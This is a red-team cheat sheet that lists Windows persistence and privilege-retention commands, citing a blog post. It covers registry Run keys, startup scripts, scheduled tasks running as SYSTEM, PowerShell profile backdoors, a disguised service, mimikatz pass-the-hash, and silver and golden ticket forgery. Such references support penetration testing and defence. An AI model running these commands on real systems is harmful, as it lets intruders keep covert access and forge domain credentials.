Persistence

Resources

https://rastamouse.me/2018/03/a-view-of-persistence/


Userland & Elevated

# Userland techniques

# HKCU
# Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. (Other keys are available).
Value name:  Backdoor
Value data:  C:\Users\Rasta\AppData\Local\Temp\backdoor.exe

# Start-up
# Create a batch script in the user startup folder.
PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe

# Scheduled Tasks
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D

# Powershell profiles
# You can backdoor the powershell profile
PS C:\> Test-Path $profile
False

PS C:\> New-Item -Path $profile -Type File –Force

    Directory: C:\Users\Rasta\Documents\WindowsPowerShell

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       22/03/2018     12:42              0 Microsoft.PowerShell_profile.ps1

PS C:\> $string = 'Start-Process "cmd.exe"'
PS C:\> $string | Out-File -FilePath "C:\Users\Rasta\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
# Elevated techniques

# HKLM
# Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows
Value name:  Backdoor
Value data:  C:\Windows\Temp\backdoor.exe

# Services
# Create a service that will start automatically or on-demand.
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."

# Scheduled Tasks
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D


Maintaining Privilege

# Steal passwords and use them with runas
runas /netonly /user:FS01\Administrator cmd
# If you can’t get passwords, use NTLM hashes with techniques such as Pass-the-Hash or psexec.
# Both domain accounts and local accounts can work.
mimikatz> sekurlsa::pth /user:Administrator /domain:FS01 /rc4:fc525c9683e8fe067095ba2ddc971889 /ptt
# Adding new local users can be a method to get back into machines
# Administrators local group is a solution, but you can also use the following groups
Remote Desktop Users
Remote Management Users
Backup Operators
# With the NTLM hash of a computer account, silver tickets can be used to regain local admin privileges via the CIFS service.
mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /target:fs01 /rc4:47b1d9d581f29b3b43845692bd4a0322 /service:cifs /ptt
# Golden tickets can be used to forge access to any service in the domain.
mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /rc4:9063b8edb3d04ed734edd49e5b0adef3 /ptt